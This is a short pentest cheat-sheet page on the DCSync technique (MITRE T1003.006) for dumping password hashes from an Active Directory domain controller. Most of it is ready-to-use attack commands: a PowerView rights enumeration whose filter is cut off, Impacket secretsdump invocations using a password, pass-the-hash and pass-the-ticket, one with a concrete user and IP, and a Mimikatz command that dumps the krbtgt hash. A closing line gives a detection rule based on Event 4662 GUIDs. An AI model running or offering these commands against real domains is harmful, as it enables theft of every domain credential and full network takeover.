DCSync

MITRE ATT&CK T1003.006

Dump Password Hashes from Domain Controller

It is a credential dumping techniques, adversary to simulate the replication process of a Domain Controllers to ask other DC to replicate information using the MS-DRSR. It cannot disabled as MS-DRSR is a necessary servers of a AD.

This attack requires domain admin privileges (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have this privileges by default.

Enumeration

Get-ObjectAcl -DistinguishedName "dc=dc1,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'ds-replication-get-changes') 

Impacket: secretsdump

# using a plaintext password
secretsdump.py -outputfile 'file.name' 'User'/'domain':'PASSWORD'@'Domain Controller IP'
secretsdump.py -just-dc administrator/fkclai-win2016\$@192.168.1.169

# with Pass-the-Hash
secretsdump.py -outputfile 'file.name' -hashes 'LMhash':'NThash' 'User'/'domain'@'Domain Controller IP'

# with Pass-the-Ticket
secretsdump.py -k -outputfile 'file.name' 'User'/'domain'@'Domain Controller IP'

Example

Mimikatz

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dc01\krbtgt"'

Detection

Monitor Windows Event Log 4662 to detect the String: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 or 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 or 89e95b76-444d-4c62-991a-0facbeda640c

Last updated